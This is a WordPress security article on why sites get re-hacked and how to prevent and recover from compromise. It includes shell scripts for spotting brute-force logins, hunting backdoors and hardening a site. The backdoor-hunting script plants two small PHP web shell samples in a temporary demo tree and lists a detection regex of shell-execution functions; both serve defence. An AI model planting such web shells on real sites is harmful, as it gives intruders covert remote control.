If your WordPress site has been hacked more than once, the problem is almost never WordPress itself. The real issue is what surrounds it: outdated plugins, weak login credentials, poor hosting environments, and incomplete malware cleanups that leave hidden backdoors wide open for attackers to walk back in. According to Patchstack’s 2025 security report, 11,334 vulnerabilities were discovered in the WordPress ecosystem in a single year — a 42% increase from the year before — and 91% of those vulnerabilities were found in plugins and themes, not in WordPress core. The good news is that the vast majority of WordPress hacks are preventable, and the steps required are not complicated.
Key Takeaways
- Outdated plugins are the single biggest entry point for attackers.
- Most hacks are automated: bots scan thousands of sites per hour looking for known weaknesses.
- If your site keeps getting re-hacked, an incomplete cleanup and leftover backdoors are almost certainly the reason.
- Strong passwords, two-factor authentication, and a web application firewall stop the majority of attacks.
- Regular backups do not prevent hacks but give you a clean recovery path when one happens.
- Cheap shared hosting increases your exposure: one compromised neighbor site can affect yours.
Why WordPress Is Such a Common Target
WordPress is the most widely used CMS in the world, which makes it the most studied, most probed, and most frequently attacked platform by automated bots. Hackers do not sit at a keyboard manually trying to break into individual sites. They run bots that scan millions of websites per day looking for known vulnerability signatures — outdated plugin version numbers, default login URLs, and weak password patterns.
The plugin and theme ecosystem is where most of the risk lives. Thousands of independent developers maintain tens of thousands of plugins, and the quality of security practices varies widely across all of them. When a vulnerability is discovered and publicly disclosed, attackers move fast. According to Patchstack’s 2025 data, attackers have been observed exploiting a vulnerability within 5 hours of its public disclosure. Most site owners are not patching that quickly.
The scale of the problem is also worth noting. 43% of WordPress vulnerabilities can be exploited without any login credentials at all — meaning an attacker does not need your username or password to get in. They just need your site to be running a vulnerable version of a plugin. As Bruce Schneier, one of the world’s foremost security experts, put it: “Security is not a product, but a process.” For WordPress site owners, that process starts with understanding exactly how attacks happen.
The Real Reasons Your WordPress Site Keeps Getting Hacked
1- Outdated Plugins and Themes
Outdated plugins and themes are the number one reason WordPress sites get hacked. When a developer patches a vulnerability, the fix is public: the changelog and the code diff tell anyone what was wrong, and bots immediately begin scanning the web for sites still running the unpatched version. Deactivating a plugin does not remove the risk. Its files stay on disk, any of them that can be requested directly is still reachable over HTTP, and anyone who gains a foothold can reactivate it. If it is installed and outdated, it is a door.
The numbers here are stark. Of the 11,334 vulnerabilities discovered in 2025, 91% were in plugins and themes. Only 6 vulnerabilities were found in WordPress core across the entire year. Premium marketplace plugins from platforms like Envato carry additional risk because they receive less independent security scrutiny — their code is not publicly accessible to researchers the way free repository plugins are.
2- Weak Passwords and No Two-Factor Authentication
Brute force attacks use bots that try thousands of password combinations per second against your wp-admin login page. The WordPress login URL is publicly known and heavily targeted. If your password is short, common, reused from another account, or based on personal information, it is only a matter of time before it is cracked.
Two-factor authentication is the fix that stops brute force attacks even when a password is compromised. With 2FA enabled, a stolen password alone is not enough to get into your admin area. Despite being free and easy to set up via plugins like WP 2FA or Google Authenticator, the majority of WordPress site owners have never turned it on. That gap is exactly what attackers count on.
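Brute force traffic is visible in the web server log long before a lockout plugin reports it. The script below is an added example, not code from the article: it reads an Apache/nginx "combined" format access log and flags every IP that posts repeatedly to the login endpoints. It also goes one step beyond the paragraph above by separating a burst that kept failing from one that ended in a successful login (wp-login.php answers a failed attempt with a 200 and a successful one with a 302 redirect), which is the case that needs an immediate password reset. It assumes the stock /wp-login.php and /xmlrpc.php paths (xmlrpc.php is a common brute-force target the article does not mention); the log lines are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the article): spot login brute-forcing in a
# combined-format web server access log. Assumptions: standard Apache/nginx
# "combined" log layout and the stock endpoints /wp-login.php and /xmlrpc.php.

# Constructed sample log: 203.0.113.7 keeps failing, 192.0.2.9 fails five
# times and then gets a 302 (wp-login.php redirects on success and re-renders
# the form with a 200 on failure), 198.51.100.20 is an ordinary visitor.
sample_log() {
  cat <<'EOF'
203.0.113.7 - - [10/Mar/2025:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:10:15:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:10:15:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:10:15:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:10:15:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "python-requests/2.31"
192.0.2.9 - - [10/Mar/2025:10:20:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:10:20:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:10:20:13 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:10:20:14 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:10:20:15 +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2025:10:20:16 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2025:10:16:02 +0000] "GET /about/ HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2025:10:16:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# login_attackers THRESHOLD   (reads the log on stdin)
# Prints "ip attempts verdict" for every IP with at least THRESHOLD POSTs to
# the login endpoints. A 302 from wp-login.php inside such a burst means a
# guess worked: that account needs a password reset right now.
login_attackers() {
  awk -v thr="$1" '
    # combined format: $1 = client IP, $6 = "METHOD (with the opening quote),
    # $7 = request path, $9 = HTTP status
    $6 == "\"POST" && ($7 == "/wp-login.php" || $7 == "/xmlrpc.php") {
      attempts[$1]++
      if ($7 == "/wp-login.php" && $9 == 302) success[$1]++
    }
    END {
      for (ip in attempts)
        if (attempts[ip] >= thr) {
          verdict = (ip in success) ? "LOGIN-SUCCEEDED" : "all-failed"
          print ip, attempts[ip], verdict
        }
    }' | sort
}

# Demo on the constructed log: a threshold of 5 flags the two bursts and
# leaves the ordinary visitor alone.
sample_log | login_attackers 5
```

Run it against a real log with something like `login_attackers 20 < /var/log/apache2/access.log`. If the site sits behind a CDN or reverse proxy, the first field will be the proxy's address; switch the script to the forwarded client IP your log format records, or every burst will appear to come from the proxy.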
3- Nulled Themes and Plugins
Nulled software is pirated paid software distributed for free across shady download sites. It almost always contains pre-installed malware, hidden backdoors, and malicious code injected before you ever install it. The moment a nulled plugin goes live on your site, an attacker potentially already has access.
Beyond the malware risk, nulled plugins have no update pathway. When a vulnerability is discovered in the original software, a legitimate user gets a patch. A nulled user gets nothing. The site remains permanently exposed to that specific exploit, with no fix available and no way to know the risk even exists.
4- Poor Hosting Environment
The hosting environment your site sits in matters more than most people realize. Cheap shared hosting places your site on a server alongside hundreds of other websites. If one of those sites gets compromised and the host has not properly isolated accounts at the server level, the infection can spread to neighboring sites including yours.
Hosts that do not enforce updated PHP versions, server-level firewalls, or malware scanning add passive risk to every site on their platform. A $2/mo hosting plan is not a saving when a single hack costs hours of cleanup time, lost search rankings, and potential customer trust damage. Security-focused managed WordPress hosts like WP Engine, Kinsta, and SiteGround handle a significant portion of the security burden at the infrastructure level.
5- Leftover Backdoors from a Previous Hack
This is the most overlooked reason sites keep getting hacked repeatedly. When a site is compromised, attackers almost always install backdoors — hidden pieces of code that let them return without needing a password. These backdoors are often buried deep in theme files, plugin directories, the wp-content/uploads folder, or injected directly into the database.
Many site owners remove the visible damage — the spam pages, the strange redirects — without ever finding and eliminating the backdoor. The attacker simply waits and re-enters. If your site has been hacked more than once, an incomplete previous cleanup is the most likely explanation. A server-side malware scan using a tool like Sucuri, MalCare, or Wordfence is the minimum, not an optional extra. Because signature scanners miss novel or lightly obfuscated code, also compare WordPress core and plugin files against fresh copies from WordPress.org (WP-CLI's core verify-checksums command does this for core) and treat any file that differs as suspect until it is explained.
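A scanner plugin is the easy route, but the same hunt can be done by hand with tools present on any host. The script below is an added example, not code from the article or from any of the scanners it names: it looks for the three things the paragraph above and the warning-sign table later on describe, PHP files in the uploads directory, PHP files anywhere under wp-content that contain the constructs web shells and injected loaders rely on, and files changed recently. It assumes the functions are given the site root as their argument; the sample tree it builds is constructed for the demo and is never handed to PHP.

```shell
#!/bin/sh
# Added example (not from the article or from any scanner it names): a
# first-pass hunt for leftover backdoors in a WordPress tree. Assumption:
# the functions take the site root as their argument; the sample tree is
# constructed here for the demo and is never executed by PHP.

# Constructs that almost never appear in legitimate plugin or theme code but
# are the raw material of web shells and injected loaders. Expect a few false
# positives (a minifier, a caching plugin); every hit still needs a human look.
IOC_REGEX='eval *\(|base64_decode *\(|gzinflate *\(|str_rot13 *\(|assert *\(|shell_exec *\(|passthru *\(|system *\(|create_function *\(|preg_replace *\(.*/e|\$_(GET|POST|REQUEST|COOKIE)\[[^]]*] *\('

# The uploads tree should hold media only; any PHP-executable file there is a red flag.
php_in_uploads() {
  find "$1/wp-content/uploads" -type f \
    \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' -o -name '*.php[0-9]' \) 2>/dev/null | sort
}

# PHP files anywhere under wp-content whose source matches an IOC pattern.
suspicious_php() {
  find "$1/wp-content" -type f -name '*.php' -exec grep -lE "$IOC_REGEX" {} + 2>/dev/null | sort
}

# Files touched in the last N days; most intruders do not bother to backdate mtimes.
recently_modified() {
  find "$1" -type f -mtime "-$2" 2>/dev/null | sort
}

# Constructed sample site: one clean plugin, one image, a web shell dropped in
# uploads, and a loader injected into the active theme's functions.php.
build_sample_site() {
  mkdir -p "$1/wp-content/uploads/2025/03" "$1/wp-content/plugins/hello" "$1/wp-content/themes/twentytwentyfour"
  printf '<?php\n/* Plugin Name: Hello */\nfunction hello_world() { return "hi"; }\n' > "$1/wp-content/plugins/hello/hello.php"
  printf 'GIF89a' > "$1/wp-content/uploads/2025/03/logo.gif"
  printf '<?php\n@eval(base64_decode($_POST["k"]));\n' > "$1/wp-content/uploads/2025/03/wp-cache.php"
  printf '<?php\nif (isset($_REQUEST["x"])) { $_REQUEST["x"]($_REQUEST["a"]); }\n' > "$1/wp-content/themes/twentytwentyfour/functions.php"
}

# Demo: run against the constructed tree (set WP_ROOT to a real site root to scan that instead).
if [ -n "${WP_ROOT:-}" ]; then
  SITE="$WP_ROOT"
else
  SITE="$(mktemp -d)"; build_sample_site "$SITE"
fi
echo "== PHP under uploads";        php_in_uploads "$SITE"
echo "== IOC pattern matches";      suspicious_php "$SITE"
echo "== modified in last 7 days";  recently_modified "$SITE" 7
[ -n "${WP_ROOT:-}" ] || rm -rf "$SITE"
```

On the sample tree the uploads check returns the planted wp-cache.php, the pattern check returns that file plus the injected functions.php, and the clean plugin is not listed. On a real site, anything the pattern check reports inside a plugin you did install should be compared against a fresh download of the same plugin version before you decide it is benign.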
6- No Web Application Firewall
A web application firewall sits between your site and incoming traffic, blocking malicious requests before they reach WordPress. It filters brute force login attempts, SQL injection attacks, cross-site scripting, and known exploit patterns automatically.
One critical detail many site owners miss: generic hosting-level firewalls block only around 12% of WordPress-specific attacks, according to Patchstack data. A WordPress-aware WAF from Wordfence, Sucuri, or Cloudflare understands the specific request patterns that WordPress vulnerabilities produce and is far more effective. Assuming your hosting provider’s security covers you at this level is a mistake that leaves the majority of WordPress-specific attack traffic unblocked.
7- Default Login Settings Left Unchanged
Using “admin” as a WordPress username is one of the first things brute force bots try. It was the WordPress default for years and remains the most commonly attacked username. The login URL at /wp-admin and /wp-login.php is publicly known and receives enormous volumes of automated attack traffic every day.
Changing the default username costs nothing, though it helps less than it sounds: WordPress exposes usernames through author archive URLs (?author=1 redirects to the author slug) and through the REST API users endpoint unless those are blocked, so treat the username as public and let the password and 2FA do the real work. Moving the login URL with a plugin like WPS Hide Login is obscurity rather than authentication, but it does keep a large share of unsophisticated bot traffic from ever reaching your login form. These are two-minute changes that remove meaningful noise and some attack surface.
Signs Your WordPress Site Has Been Hacked
Many hacks run silently for weeks or months before a site owner notices. Attackers prefer to stay hidden — injecting spam content, harvesting data, using your server to send phishing emails — without triggering any obvious disruption. These are the warning signs to check regularly:
| Warning Sign | What It Means |
| --- | --- |
| Google Search Console shows security warnings | Google has detected malware or hacked content on your site |
| Browser shows ‘This site may be hacked’ | Google’s Safe Browsing has flagged your domain |
| Visitors are redirected to spam or adult sites | Redirect malware or a compromised .htaccess file |
| New admin users you did not create | Attacker has created persistent access accounts |
| PHP files in /wp-content/uploads/ | Malicious scripts planted in a folder that should hold media only |
| Spam pages appearing in Google results | SEO spam injection — casino, pharma, or foreign-language content |
| Hosting provider suspends your account | Host’s malware scanner detected a serious infection |
| Unexplained CPU or bandwidth spikes | Your server is being used to send spam or run attacks |
| Emails from your domain land in spam | Your domain reputation has been damaged by malicious sending |
| Your password suddenly stops working | Attacker has changed your credentials to lock you out |
How to Prevent Your WordPress Site from Getting Hacked
Keep Everything Updated
Every WordPress core update, plugin update, and theme update that goes uninstalled is a known vulnerability sitting on your site waiting to be exploited. Updates are the single highest-return security action available to any WordPress site owner.
- Enable automatic updates for WordPress core minor releases
- Update all plugins and themes immediately when patches are available
- Remove inactive plugins and themes entirely — deactivated does not mean safe
- Read the changelog when a release is flagged as a security fix and apply it first; for larger updates, test on a staging copy rather than holding the patch back from the live site
- Replace abandoned plugins (no updates in 12+ months) with actively maintained alternatives
Use Strong Unique Passwords and a Password Manager
Every account connected to your WordPress site — admin users, hosting account, FTP, database — needs a unique password that is not used anywhere else. Password reuse is how one data breach at an unrelated service becomes a WordPress hack. A leaked credential from a breach database gets tested against WordPress login pages automatically.
- Minimum 16 characters with mixed case, numbers, and symbols
- Never reuse a password across any two accounts
- Use a password manager like Bitwarden or 1Password to generate and store credentials
- Force all admin and editor users on your site to update their passwords
Enable Two-Factor Authentication on Every Admin Account
Two-factor authentication means that even if an attacker has your correct password, they still cannot log in without the second verification step. App-based authenticators like Google Authenticator and Authy are more secure than SMS-based 2FA, since phone numbers can be hijacked through SIM swapping attacks.
Install WP 2FA or a similar plugin and apply it to every administrator and editor account on your site — not just your own. A single team member with 2FA disabled is an open door for the entire site.
Install a Security Plugin with a Web Application Firewall
A dedicated WordPress security plugin handles firewall protection, malware scanning, login attempt limiting, and real-time alerts from inside the WordPress application layer — where hosting-level security cannot reach.
| Plugin | Key Features | Cost |
| --- | --- | --- |
| Wordfence | WAF, malware scanner, brute force protection, live traffic monitor | Free / Premium from $119/yr |
| Sucuri Security | WAF, malware scanning, post-hack cleanup, blacklist monitoring | Free / Premium from $199/yr |
| iThemes Security | Login protection, file change detection, 2FA, database backups | Free / Premium from $99/yr |
| MalCare | Deep malware scanning, one-click cleanup, bot protection | Premium from $99/yr |
Change the Default Login URL and Username
Move your login page away from /wp-admin and /wp-login.php using WPS Hide Login. This alone removes a significant volume of automated attack traffic that never needs to reach your server. Pair this with a login attempt limiter that blocks an IP address after three to five failed attempts. If the site sits behind a CDN or reverse proxy such as Cloudflare, make sure the limiter reads the real client address from the proxy's forwarded-IP header rather than the proxy's own address; otherwise it will either block nothing or block the proxy for every visitor at once.
If your current WordPress username is “admin”, create a new administrator account with a different username, reassign all of the old account's content to it, and delete the old account. This two-minute change removes the most commonly guessed username from your site. Bear in mind that usernames can still be enumerated through author archives and the REST API, so this reduces noise rather than acting as a lock; the password and 2FA remain the controls that matter.
Set Up Automated Backups Stored Off-Site
Backups do not stop attacks, but they make recovery clean and fast. Without a recent backup, recovering from a serious hack can mean rebuilding the site from scratch. With one, recovery is a restoration process measured in minutes.
- Use UpdraftPlus, BlogVault, or your host’s built-in backup tool
- Store backups off-site — not on the same server as your WordPress installation
- Set daily backups for active sites, weekly minimum for low-traffic sites
- Test your restore process periodically — a backup you have never tested may not work when needed
Switch to Security-Focused Managed Hosting
If you are currently on cheap shared hosting, the infrastructure around your site is working against your security. Managed WordPress hosts build security into the server layer — isolated accounts, server-level firewalls, automatic malware scanning, and PHP version enforcement are all standard.
The cost difference between cheap shared hosting and entry-level managed WordPress hosting is often $10-$20/mo. When weighed against the cost in time, lost traffic, and cleanup work that a single hack produces, managed hosting is consistently the better investment for any site generating real business value.
What to Do Immediately If Your Site Is Hacked Right Now
Time matters when a site is compromised. Every hour of delay means more spam content indexed by Google, more visitors exposed to malware, and more time for the attacker to deepen their access. Work through these steps in order:
- Put the site in maintenance mode to stop visitors being exposed to malicious content
- Change all passwords immediately (WordPress admin accounts, hosting panel, FTP/SFTP, and database) and rotate the secret keys and salts in wp-config.php so that every existing login session, including any the attacker holds, is invalidated
- Contact your hosting provider — server logs can identify the breach entry point
- Run a full malware scan: a remote scanner such as Sucuri SiteCheck only sees what is served to visitors, so follow it with a server-side scan using MalCare or Wordfence that can read the files on disk
- Restore from a clean backup taken before the compromise if one exists, remembering that backdoors are often planted well before the visible symptoms appear, so choose a backup older than the first sign of trouble
- Remove all malware files, injected code, unknown admin accounts, and backdoors
- Update every plugin, theme, and WordPress core to current versions
- Submit a Security Review request in Google Search Console to remove browser warnings
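The containment steps in that list are mostly file edits in the site root, and they are easy to get subtly wrong under pressure (the WordPress maintenance flag, for one, expires on its own after ten minutes). The script below is an added example, not code from the article: it scripts maintenance mode, the lock-out of existing sessions by rotating the salts in wp-config.php, and two hardening steps the list implies but does not spell out, blocking PHP execution under uploads and disabling the dashboard file editor, then tightens file permissions. It assumes Apache with .htaccess honoured (nginx needs an equivalent location rule in the vhost), PHP running as the file owner, and a stock wp-config.php layout; the wp-config.php it builds is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the article): the containment and lock-out steps
# from the incident list, scripted against the site root, plus two hardening
# steps the list implies. Assumptions: Apache with .htaccess honoured (nginx
# needs an equivalent location rule), PHP running as the file owner, and a
# stock wp-config.php layout. The sample config is constructed for the demo.

# 1. Maintenance mode. WordPress serves a 503 while a .maintenance file in the
#    site root carries a $upgrading timestamp less than 10 minutes old; after
#    that the file is ignored, so refresh it (or use a plugin) for a long cleanup.
enable_maintenance()  { printf '<?php $upgrading = %s;\n' "$(date +%s)" > "$1/.maintenance"; }
disable_maintenance() { rm -f "$1/.maintenance"; }
maintenance_active() {
  f="$1/.maintenance"; [ -f "$f" ] || return 1
  ts="$(sed -n 's/.*\$upgrading *= *\([0-9][0-9]*\).*/\1/p' "$f")"
  [ -n "$ts" ] && [ $(( $(date +%s) - ts )) -lt 600 ]
}

# 2. Deny PHP execution under uploads (Apache 2.4 syntax).
deny_php_in_uploads() {
  mkdir -p "$1/wp-content/uploads"
  cat > "$1/wp-content/uploads/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|phar|php[0-9])$">
  Require all denied
</FilesMatch>
EOF
}

# 3. Turn off the dashboard theme/plugin editor, a favourite persistence route.
#    (Checks presence only; a line that defines it as false must be fixed by hand.)
disable_file_edit() {
  cfg="$1/wp-config.php"
  grep -q 'DISALLOW_FILE_EDIT' "$cfg" && return 0
  awk -v line="define( 'DISALLOW_FILE_EDIT', true );" 'NR == 1 { print; print line; next } { print }' \
    "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# 4. Rotate the keys and salts. Every auth cookie is HMACed with them, so new
#    values force every session site-wide to log in again, including any the
#    attacker still holds for accounts you have not reset yet. Lines that are
#    absent (salts kept elsewhere) are left alone.
rotate_salts() {
  cfg="$1/wp-config.php"
  for k in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
           AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
    v="$(head -c 48 /dev/urandom | base64 | tr -d '\n/+=')"
    awk -v key="$k" -v val="$v" -v q="'" \
      '$0 ~ ("define\\( *" q key q) { print "define( " q key q ", " q val q " );"; next } { print }' \
      "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
  done
}

# 5. Permissions: directories 755, files 644, wp-config.php 600 (use 640 with
#    the web server's group instead if PHP does not run as the file owner).
fix_permissions() {
  find "$1" -type d -exec chmod 755 {} +
  find "$1" -type f -exec chmod 644 {} +
  chmod 600 "$1/wp-config.php"
}

harden_site() {
  enable_maintenance "$1"; deny_php_in_uploads "$1"; disable_file_edit "$1"
  rotate_salts "$1"; fix_permissions "$1"
}

# Constructed wp-config.php with the placeholder salts a fresh install ships with.
build_sample_config() {
  mkdir -p "$1/wp-content/uploads"
  cat > "$1/wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'wp' );
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );
$table_prefix = 'wp_';
require_once ABSPATH . 'wp-settings.php';
EOF
}

# Demo on the constructed site; call harden_site with a real site root to use it.
DEMO="$(mktemp -d)"; build_sample_config "$DEMO"; harden_site "$DEMO"
maintenance_active "$DEMO" && echo "maintenance mode is on; refresh .maintenance every few minutes"
echo "placeholder salts remaining: $(grep -c 'put your unique phrase here' "$DEMO/wp-config.php")"
rm -rf "$DEMO"
```

Run the steps in this order on a real site and keep the .maintenance file fresh until the cleanup is finished; once the site is clean, remove it with disable_maintenance. Rotating the salts logs you out as well, which is the point: after the rotation, the only sessions that exist are the ones created with the new passwords.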
Once the site is clean, do not stop there. Identify specifically how the attacker got in. If the entry point is not closed — a vulnerable plugin still installed, a weak password still in use — the same attack will happen again. Cleanup without root cause resolution is just delaying the next incident.
Frequently Asked Questions
Why does my WordPress site keep getting hacked even after I clean it?
The most common cause is an incomplete cleanup. Attackers almost always install backdoors — hidden code that lets them return without a password. Removing visible malware without finding every backdoor means the attacker still has a way back in. A thorough scan using a tool like MalCare or Sucuri, followed by a full password reset on all accounts, is required to break the cycle.
Is WordPress itself insecure?
WordPress core is not the problem. Only 6 vulnerabilities were found in WordPress core across all of 2025. The risk sits in the plugins, themes, and configurations built around it. A WordPress site with minimal, well-maintained plugins and proper security settings is as safe as any other platform.
How do hackers find my WordPress site?
Automated bots scan millions of sites per day looking for known vulnerability signatures — outdated plugin version numbers, default login URLs, and common password patterns. Your site was almost certainly not manually targeted. It was found by a bot running an automated sweep and matched a known vulnerability profile.
Can cheap hosting cause my WordPress site to get hacked?
Yes. Shared hosting without proper account isolation means a compromised site on the same server can affect yours through cross-contamination. Hosts that do not enforce updated PHP versions or server-level malware scanning add passive risk to every site on their platform. Security-focused managed WordPress hosting significantly reduces this exposure.
How do I know if my WordPress site has been hacked?
Check Google Search Console for security warnings or manual actions. Look for unfamiliar admin user accounts in your dashboard, unexpected redirects, PHP files in your uploads directory, and spam pages appearing in your Google search results. Your hosting provider’s malware alerts and browser warnings from visitors are also reliable early signals.
Do I need a security plugin if my host already provides security?
Yes. Hosting-level security handles server infrastructure threats but cannot address WordPress-specific attack vectors like plugin exploits, brute force login attempts, and file injection inside the application layer. A WordPress security plugin adds protection that hosting-level tools are not designed to provide. Both layers together give you the most complete coverage.
What is the fastest way to secure a WordPress site?
Update every plugin, theme, and WordPress core to current versions. Change all passwords to strong unique ones. Enable two-factor authentication on all admin accounts. Install a security plugin with a WAF. Remove unused plugins and themes. Change the default login URL. These six steps, done in under an hour, close the entry points responsible for the large majority of WordPress hacks.
Can a hacked WordPress site affect my SEO?
Yes, significantly. Google blacklists sites with detected malware and injects ‘This site may be hacked’ warnings directly into your search listings. SEO spam injection replaces your legitimate pages with casino, pharma, or foreign-language spam content in search results. Recovering your search visibility after a serious hack can take two to four weeks even after a clean site has been resubmitted for Google’s review.